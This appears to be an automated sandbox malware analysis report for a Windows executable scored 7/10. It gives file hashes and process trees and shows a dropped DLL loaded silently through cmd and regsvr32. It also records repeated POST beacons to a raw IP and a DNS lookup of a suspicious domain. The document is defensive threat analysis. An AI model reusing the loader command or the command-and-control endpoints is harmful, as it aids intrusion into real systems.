Analysis

  • max time kernel
    152s
  • max time network
    198s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/12/2022, 14:03 UTC

General

  • Target

    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe

  • Size

    179KB

  • MD5

    8155b71a2e4562b5e682d22f0010bd24

  • SHA1

    6a9bc4ae28b678ec766ccc6e1e80bd8e0216f3f5

  • SHA256

    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b

  • SHA512

    8966917fa4607935d370704ecab41461615239258419891ae70de086956f86fda693f9070e09da25cff110e51e75806ff92c943c914839f885fe168c4929a65a

  • SSDEEP

    3072:X875giexVu7fhrnv6MJQPRu2uuQ6ET31Ap0A+GpMWLHJiFp3:slPex8VuMepBLRLpiz

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    "C:\Users\Admin\AppData\Local\Temp\649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe"
    1⤵
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\regsvr32.exe /s "C:\ProgramData\2266\msseedir.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:856
      • C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\system32\regsvr32.exe /s "C:\ProgramData\2266\msseedir.dll"
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:1340

Network

  • flag-unknown
    DNS
    selftestingmultiformat.org
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    8.8.8.8:53
    Request
    selftestingmultiformat.org
    IN A
    Response
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:31 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:41 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:52 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:03 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:14 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:25 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:36 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:47 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:58 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 36
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:50:09 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2676
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:33 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2676
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:44 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2676
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:48:54 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:05 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:16 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:27 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:38 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:49:49 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:50:00 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • flag-unknown
    POST
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    regsvr32.exe
    Remote address:
    198.58.109.201:80
    Request
    POST /sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 198.58.109.201
    Content-Length: 2664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Fri, 09 Dec 2022 20:50:11 GMT
    Content-Type: text/html
    Content-Length: 178
    Connection: keep-alive
  • 198.58.109.201:80
    http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000
    http
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    4.2kB
    7.3kB
    28
    21

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/searc?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0&p=1000

    HTTP Response

    404
  • 198.58.109.201:80
    http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0
    http
    regsvr32.exe
    32.6kB
    8.0kB
    45
    37

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404

    HTTP Request

    POST http://198.58.109.201/sea?fr=altavista&itag=ody&q=bfa00a247737d50648cb23c497e44ba2%2Cb6385e6271d8a642&kgs=1&kls=0

    HTTP Response

    404
  • 8.8.8.8:53
    selftestingmultiformat.org
    dns
    649816a62a2ff50cb68d0a9e5a228b3c2b5a02019e02d6239bc240467ed8c03b.exe
    72 B
    154 B
    1
    1

    DNS Request

    selftestingmultiformat.org

MITRE ATT&CK Enterprise v6

Downloads

  • C:\ProgramData\2266\msseedir.dll

    Filesize

    92KB

    MD5

    7cb12175da81309e26bb86cd25c49540

    SHA1

    86b7de2a4a84b82ef19e0626b34edda01e46c93d

    SHA256

    3c3c6e8eaccf40b723d6225fdfb58a29e42c8071406bf70ef427c59fae21ea85

    SHA512

    22172711f774a1163e6b25d6c229b925f87d088c0cb494b0c827bd4c6e0d153352048739a2254ce0ea364f45c74710da13a53fa256992feb1f31861bdc8d4631

  • \ProgramData\2266\msseedir.dll

    Filesize

    92KB

    MD5

    7cb12175da81309e26bb86cd25c49540

    SHA1

    86b7de2a4a84b82ef19e0626b34edda01e46c93d

    SHA256

    3c3c6e8eaccf40b723d6225fdfb58a29e42c8071406bf70ef427c59fae21ea85

    SHA512

    22172711f774a1163e6b25d6c229b925f87d088c0cb494b0c827bd4c6e0d153352048739a2254ce0ea364f45c74710da13a53fa256992feb1f31861bdc8d4631

  • memory/1340-72-0x0000000010000000-0x0000000010020000-memory.dmp

    Filesize

    128KB

  • memory/1340-71-0x00000000002C0000-0x00000000002D7000-memory.dmp

    Filesize

    92KB

  • memory/1340-70-0x0000000010000000-0x0000000010020000-memory.dmp

    Filesize

    128KB

  • memory/1340-69-0x00000000002C0000-0x00000000002D7000-memory.dmp

    Filesize

    92KB

  • memory/1792-58-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

  • memory/1792-63-0x0000000000230000-0x0000000000246000-memory.dmp

    Filesize

    88KB

  • memory/1792-62-0x0000000000260000-0x0000000000277000-memory.dmp

    Filesize

    92KB

  • memory/1792-61-0x0000000000230000-0x0000000000246000-memory.dmp

    Filesize

    88KB

  • memory/1792-60-0x0000000000260000-0x0000000000277000-memory.dmp

    Filesize

    92KB

  • memory/1792-59-0x0000000000230000-0x0000000000250000-memory.dmp

    Filesize

    128KB

  • memory/1792-54-0x0000000000260000-0x0000000000293000-memory.dmp

    Filesize

    204KB

  • memory/1792-57-0x0000000000260000-0x0000000000293000-memory.dmp

    Filesize

    204KB

  • memory/1792-56-0x0000000000260000-0x0000000000277000-memory.dmp

    Filesize

    92KB

  • memory/1792-55-0x00000000760A1000-0x00000000760A3000-memory.dmp

    Filesize

    8KB